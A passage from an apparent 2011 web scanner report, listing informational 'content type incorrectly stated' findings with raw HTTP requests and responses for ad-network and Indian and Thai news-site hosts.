Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:06:11 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s2";

31.20. http://beacon.videoegg.com/pageloaded  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /pageloaded

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pageloaded?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103285566&et=9179 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:11:58 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s4";

31.21. http://beacon.videoegg.com/tload  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /tload

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tload?adtype=inv&area=INDIATIMES_US&ccid=1977158-1&fv=10.3.183&pb=indiatimes&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&totime=3020&version=2&curtime=1315103301836&curtz=300&ord=11 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:20:20 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

31.22. http://blogs.timesofindia.indiatimes.com/main/page/recentEntriesFeed  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.timesofindia.indiatimes.com
Path:   /main/page/recentEntriesFeed

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /main/page/recentEntriesFeed?format=json&section=City&n=1 HTTP/1.1
Host: blogs.timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 04 Sep 2011 01:38:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 403
Expires: Sun, 04 Sep 2011 02:33:51 GMT
Date: Sun, 04 Sep 2011 02:33:51 GMT
Connection: close
Vary: Accept-Encoding

var recent_posts ={recentEntries:[
       {
       'authorBlog':'http://blogs.timesofindia.indiatimes.com/Swaminomics',
       'imageUrl':'http://blogs.timesofindia.indiatimes.com/Swaminomics/resource/swami_S.jpg',

...[SNIP]...

31.23. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; uid=1_1315097285_1314893682667:5756480826433243; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315106950_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 817

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAAB
...[SNIP]...

31.24. http://lvs.truehits.in.th/goggen.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://lvs.truehits.in.th
Path:   /goggen.php

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /goggen.php?hc=s0028944&bv=0&rf=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news&test=TEST&web=5eCi%2bmWXtRl9zACMF608bw%3D%3D&bn=Netscape&ss=1920*1200&sc=16&sv=1.3&ck=y&ja=y&vt=2BAEE501.1&fp=s&fv=10.3%20r183&truehitspage=HOMEPAGE&truehitsurl=http%3a//www.bangkokpost.com/ HTTP/1.1
Host: lvs.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: truehitsid=fMKhxT77; expires=Thu, 31-Dec-2037 17:00:00 GMT; path=/
Content-type: image/jpeg
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Connection: close
Date: Sun, 04 Sep 2011 02:25:06 GMT
Server: lighttpd
Content-Length: 91

GIF89a............333....!.......,..........,....=..l.....jzc].Vq.g..0....#.....w9........;

31.25. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /gadgets/ifr HTTP/1.1
Host: mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:15:47 GMT
Expires: Sun, 04 Sep 2011 04:15:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

Missing or malformed url parameter

31.26. http://media1.bangkokpost.com/common/img/bg/bg_directoryhome.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media1.bangkokpost.com
Path:   /common/img/bg/bg_directoryhome.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /common/img/bg/bg_directoryhome.jpg HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Accept-Ranges: bytes
ETag: "107156136"
Last-Modified: Sun, 03 Jul 2011 10:35:40 GMT
Content-Length: 7231
Connection: close
Date: Sun, 04 Sep 2011 02:25:13 GMT
Server: lighttpd/1.4.22

GIF89a..\...............................................................................................................................................................................................
...[SNIP]...

31.27. http://media1.bangkokpost.com/common/img/bg/bg_popular_reader.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media1.bangkokpost.com
Path:   /common/img/bg/bg_popular_reader.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /common/img/bg/bg_popular_reader.jpg HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Accept-Ranges: bytes
ETag: "3938456098"
Last-Modified: Sun, 03 Jul 2011 10:38:28 GMT
Content-Length: 5466
Connection: close
Date: Sun, 04 Sep 2011 02:25:12 GMT
Server: lighttpd/1.4.22

GIF89a&.K...............................................................................................................................................................................................
...[SNIP]...

31.28. http://msite.martiniadnetwork.com/index/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://msite.martiniadnetwork.com
Path:   /index/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /index/?pid=1000000986802&sid=1000005169510&loc=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&rnd=890733501&ref=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142 HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MMNBASEID=21051315103139790868608; OptOut=no; MMNBASEVAL=cG8IvxHEQGZ7AAQ%2FKkpAKSZQ4bf6EKUegVRojKanLLDe9BVikgcl25tE9iMUzjWnqqMEeqhlz5IdBuUB0MK3B%2FsCMFl%2FfNWhi7CI%2F8jSGRqObm%2FaKwWALRMUAI9drq1rn0ihQUhkYZ0eDBEzTt7rKZZanJWuK%2BsXfErkfA%3D%3D; MMNATTR=6%2Fsptoq4rcqn54lAbIk8LF%2Fw6jXKmlMTnkNsgMEYFzXA9gs%2BC4SMYjcD%2BAGjscVN9gzYKdEkAFwmYicReq5BMRRMpDZDghdUJfcY7cPB5ggAfafqpXCAYwIBp4vEBzDQiijQMpZNuE6Q83ST6zbLFZuFnGP6YgJAWTddEEguv72RhOtelqeiIK9HUXc8ysbiPgi%2BZY6BA8PDPTuwS%2F4kl3GxtOqDY%2BoqCYfu7oIYgZJKAw9avIJ0bnoHjFfW7D96n20aoNZnj7aEqIydyS7GWNzKKjsxnDfQoLiuPSGJLP5fTc%2FW7N2CE5UbmCbv3UeE7P4ie09b1uxpnb0BUZtJP2xPYGr7f9B79LtMJrS7AeUHdU%2B%2BaULygIHL0fTQS2pFF9TCgiCz8u%2BD; MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; MMNSESSIDC=2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=dg1OGlDFQEGBWEfS7tLtvB2icx%2F43QwcZuByc7hC%2FFwpNwg2dcJs16mi0QkZqrufiuALx2jw6cCPE5uyZkG3w6gti9rk94qf4YBDg56Zb3DJpkERIlu9gyMTqr%2B1qet31h2TMOLXTWLXAEmslILn8GHESyuOt3NUKYvzzw%3D%3D; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNATTR=IFEW09kJhL%2B4vn52PCYvaTZbe3g92AUd3icRwb8wT0yGEyQ%2FHCSgkxR0S3axnH8iWB6cSzqhcPm%2B8%2Flckb%2B%2BvtS5UUl3AroG8T%2B%2BMFT%2FyHfvAKlQxDC%2B9x0Q%2BpPydeyGBra3LWkVCZo4aOrGwRyVEw16t%2B006q%2BGQp%2Bg0goHUldyWQYRF839l7TaJ%2FrhAHCUPIoAyWZbaTrEF5JnWto%2FoNmkqAAt4n%2Fm4Hd72GSULxEvvWc3h00v4MuQG%2BKJLjiwWF8nQ5YwfNQhp%2BBc%2B9rSQN2KBZ0f%2FK7eFXxuTawHOWNHHcD7XK9F28ZqHNopTljY0R6t5chCPG5b2LlEvD1gN69o2yc6eBEZgllBkIOBANJtUlaCVa7EDc2iWO3ESSzdaDIdKANoLgTP; expires=Fri, 02-Mar-2012 02:28:14 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=3; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 02:28:14 GMT
Vary: Accept-Encoding
Content-Length: 1322
Content-Type: text/html


var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A%2F%2Fwww.ndtv.com%2Farti
...[SNIP]...

31.29. http://netspiderads2.indiatimes.com/ads.dll/getxmlad  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/getxmlad

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ads.dll/getxmlad?slotid=36287&rettype=1 HTTP/1.1
Host: netspiderads2.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; GeoDetail=254%2C915%2C58141; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:59:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: GeoDetail=254%2C915%2C58141; path=/; expires=Mon, 05 Sep 2011 08:29:35 GMT
Expires: Mon, 08 Dec 2008 02:59:35 GMT
Content-Type: text/html
Content-Length: 199

document.write('<script tagid="bf0cc1c2f091a8d9d248bd91c646fdfe" src="' + "http://amconf.videoegg.com/tagconf/current/bf0cc1c2f091a8d9d248bd91c646fdfe/config.js?" + Math.random() + '"></s'+'cript>');

31.30. http://rtb0.doubleverify.com/rtb.ashx/verifyc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rtb0.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5641720&plc=68132545&sid=265920&num=5&ver=2&dv_url=http%3A//adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top%3F&callback=__verify_callback_861822773003 HTTP/1.1
Host: rtb0.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/88958/233224/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Sun, 04 Sep 2011 02:26:34 GMT
Content-Length: 33

__verify_callback_861822773003(2)

31.31. http://social.ndtv.com/static/Comment/Form/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /static/Comment/Form/ HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 04:18:50 GMT
Content-Length: 43
Connection: close

This application is not registered with us.

31.32. http://social.ndtv.com/static/Comment/List/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://social.ndtv.com
Path:   /static/Comment/List/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /static/Comment/List/ HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 04:18:53 GMT
Content-Length: 43
Connection: close

This application is not registered with us.

31.33. http://static.dnaindia.com/images/710/lead-dot-g.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.dnaindia.com
Path:   /images/710/lead-dot-g.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /images/710/lead-dot-g.png HTTP/1.1
Host: static.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: Vd2vpmrY1Uscyz0il4H6kDy0zHlLJd/aB6K5D/HGCiPGkYMYqEAs6ZZqFFTXR4oZ
x-amz-request-id: DC542F814221777A
Date: Sun, 04 Sep 2011 02:25:40 GMT
x-amz-meta-cb-modifiedtime: Tue, 09 Aug 2011 13:38:41 GMT
Last-Modified: Tue, 09 Aug 2011 13:45:31 GMT
ETag: "940b47c81add94663100e9a15891acb6"
Accept-Ranges: bytes
Content-Type: image/png
Content-Length: 64
Server: AmazonS3

GIF89a    .    ................!.......,....    .    ....T.a..../.zg.N%$..;

31.34. http://static.dnaindia.com/images/710/lead-dot-y.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.dnaindia.com
Path:   /images/710/lead-dot-y.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /images/710/lead-dot-y.png HTTP/1.1
Host: static.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: UEqeY00Y2Pl9vZzhFDHFAOpdj9t0Q/6zGnAGixtw4Bl0aq5DHdd3FBgrDmeaL8Ff
x-amz-request-id: 752D916558AF98BB
Date: Sun, 04 Sep 2011 02:25:40 GMT
x-amz-meta-cb-modifiedtime: Tue, 09 Aug 2011 13:38:50 GMT
Last-Modified: Tue, 09 Aug 2011 13:45:33 GMT
ETag: "e460b345d50e39d4cfa4e0348990cec8"
Accept-Ranges: bytes
Content-Type: image/png
Content-Length: 49
Server: AmazonS3

GIF89a    .    ..........!.......,....    .    ..........O..;

31.35. http://static.social.ndtv.com/plugins/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.social.ndtv.com
Path:   /plugins/index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /plugins/index.php HTTP/1.1
Host: static.social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 04:19:35 GMT
Content-Length: 63
Connection: close

Some error occurred parameters not correct.Some error occurred.

31.36. http://timesofindia.indiatimes.com/logtopickeywords.cms  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://timesofindia.indiatimes.com
Path:   /logtopickeywords.cms

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /logtopickeywords.cms?query=Xss HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.5.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); topic_visit1=Xss

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sun, 04 Sep 2011 03:37:03 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 13
Expires: Sun, 04 Sep 2011 03:37:04 GMT
Date: Sun, 04 Sep 2011 03:37:04 GMT
Connection: close

<!--OK-->OK
   

31.37. http://timesofindia.indiatimes.com/recommendedarticles.cms  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://timesofindia.indiatimes.com
Path:   /recommendedarticles.cms

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /recommendedarticles.cms HTTP/1.1
Host: timesofindia.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sun, 04 Sep 2011 04:14:00 GMT
Content-Language: en
Content-Type: text/html;charset=UTF-8
